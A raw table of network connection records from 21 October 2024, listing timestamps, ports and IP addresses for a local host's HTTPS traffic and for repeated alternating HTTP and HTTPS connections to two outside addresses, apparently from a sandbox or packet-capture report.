Oct 21, 2024 11:57:04.007563114 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.009921074 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.010001898 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.010026932 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.010097027 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.012600899 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.012681007 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.012763023 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.012844086 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.012851954 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.012917042 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.015397072 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.015474081 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.015480995 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.015546083 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.018130064 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.018208027 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.018214941 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.018281937 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.020667076 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.020744085 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.020750999 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.020812035 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.023468971 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.023540974 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.023549080 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.023611069 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.025892019 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.026047945 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.026053905 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.026130915 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.028322935 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.028399944 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.028407097 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.028469086 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.030936003 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.031009912 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.031017065 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.031080961 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.033518076 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.033591032 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.033597946 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.033659935 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.036159992 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.036233902 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.036241055 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.036303997 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.045713902 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.045753956 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.045778036 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.045826912 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.045834064 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.045917988 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.046056032 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.046127081 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.046133995 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.046221018 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.046427011 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.046504974 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.046511889 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.046575069 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.048510075 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.048593998 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.048600912 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.048661947 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.050893068 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.050966978 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.050973892 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.051033020 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.053364038 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.053440094 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.053446054 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.053503990 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.055636883 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.055712938 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.055718899 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.055779934 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.058207035 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.058288097 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.058295012 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.058358908 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.060333967 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.060412884 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.060419083 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.060483932 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.062587976 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.062670946 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.062679052 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.062747002 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.067599058 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.067681074 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.067697048 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.067780972 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.068614960 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.068695068 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.068701029 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.068779945 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.070873976 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.070947886 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.070955038 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.071017027 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.072453022 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.072530031 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.072536945 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.072603941 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.074475050 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.074551105 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.074575901 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.074641943 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.076414108 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.076484919 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.076515913 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.076575041 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092026949 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092077971 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092108011 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092118025 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092132092 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092241049 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092248917 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092340946 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092495918 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092541933 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092569113 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092576027 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092581987 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092617035 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092664003 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.092673063 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.092771053 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.093403101 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.093457937 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.093482018 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.093487024 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.093496084 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.093527079 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.093611956 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.093616962 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.093676090 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.094268084 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.094342947 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.094348907 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.094407082 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.095506907 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.095546007 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.095580101 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.095587015 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.095630884 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.095720053 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.095859051 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.095895052 CEST	443	54083	142.250.184.225	192.168.2.4
Oct 21, 2024 11:57:04.095974922 CEST	54083	443	192.168.2.4	142.250.184.225
Oct 21, 2024 11:57:04.354460001 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:04.359253883 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:04.359323978 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:04.359499931 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:04.364324093 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:04.998887062 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:05.002331018 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:05.007183075 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:05.377093077 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:05.416589022 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:05.695106983 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:05.695142984 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:05.695215940 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:05.696805000 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:05.696816921 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.304892063 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.305087090 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.309115887 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.309142113 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.309410095 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.312453985 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.359397888 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.447138071 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.447206020 CEST	443	54115	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.447248936 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.455332994 CEST	54115	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.460771084 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:06.465547085 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:06.608454943 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:06.610409975 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.610439062 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.610519886 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.610778093 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:06.610788107 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:06.651000023 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.218283892 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:07.220334053 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:07.220355988 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:07.359287977 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:07.359349012 CEST	443	54121	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:07.359411955 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:07.359885931 CEST	54121	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:07.363074064 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.364192009 CEST	54126	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.368284941 CEST	80	54107	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:07.368356943 CEST	54107	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.369220972 CEST	80	54126	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:07.369287014 CEST	54126	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.369353056 CEST	54126	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:07.374166012 CEST	80	54126	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:08.007764101 CEST	80	54126	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:08.009115934 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.009160042 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.009243965 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.009494066 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.009510040 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.057251930 CEST	54126	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:08.613347054 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.614933014 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.614962101 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.752343893 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.752408028 CEST	443	54131	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:08.752527952 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.752979040 CEST	54131	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:08.756908894 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:08.761775017 CEST	80	54136	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:08.761869907 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:08.762512922 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:08.767400980 CEST	80	54136	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:09.394260883 CEST	80	54136	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:09.395329952 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:09.395344973 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:09.395401001 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:09.395611048 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:09.395621061 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:09.447869062 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:09.991086006 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:09.992563963 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:09.992588043 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:10.128932953 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:10.129035950 CEST	443	54140	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:10.129112959 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:10.129524946 CEST	54140	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:10.132973909 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:10.133979082 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:10.138258934 CEST	80	54136	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:10.138350964 CEST	54136	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:10.138812065 CEST	80	54145	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:10.138875008 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:10.138943911 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:10.143656015 CEST	80	54145	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:10.795423985 CEST	80	54145	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:10.796649933 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:10.796673059 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:10.796752930 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:10.796956062 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:10.796968937 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:10.838512897 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.404571056 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:11.410343885 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:11.410356998 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:11.549391985 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:11.549470901 CEST	443	54151	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:11.549567938 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:11.550184011 CEST	54151	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:11.553577900 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.554094076 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.558974028 CEST	80	54145	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:11.559026957 CEST	54145	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.559034109 CEST	80	54155	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:11.559096098 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.559163094 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:11.563990116 CEST	80	54155	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:12.199179888 CEST	80	54155	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:12.201894045 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:12.201935053 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:12.201994896 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:12.207916975 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:12.207932949 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:12.244714022 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.020056963 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.021644115 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.021687031 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.158283949 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.158348083 CEST	443	54160	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.158451080 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.158783913 CEST	54160	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.162216902 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.163245916 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.167292118 CEST	80	54155	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:13.167359114 CEST	54155	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.167968035 CEST	80	54166	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:13.168030977 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.168103933 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:13.172859907 CEST	80	54166	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:13.818181038 CEST	80	54166	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:13.819391012 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.819427967 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.819490910 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.819753885 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:13.819770098 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:13.869740009 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.516910076 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:14.518317938 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:14.518342972 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:14.655736923 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:14.655819893 CEST	443	54170	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:14.655936003 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:14.656449080 CEST	54170	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:14.660638094 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.661221027 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.665941000 CEST	80	54166	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:14.666011095 CEST	80	54176	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:14.666018963 CEST	54166	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.666095018 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.666161060 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:14.670980930 CEST	80	54176	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:15.311129093 CEST	80	54176	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:15.312138081 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:15.312172890 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:15.312299013 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:15.312796116 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:15.312809944 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:15.354114056 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:15.931974888 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:15.933428049 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:15.933458090 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:16.073771000 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:16.073898077 CEST	443	54181	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:16.074156046 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:16.074512959 CEST	54181	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:16.077542067 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:16.078727961 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:16.083834887 CEST	80	54187	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:16.084006071 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:16.084129095 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:16.088896990 CEST	80	54187	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:16.092586994 CEST	80	54176	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:16.092674017 CEST	54176	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:16.724349976 CEST	80	54187	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:16.726660967 CEST	54191	443	192.168.2.4	188.114.97.3
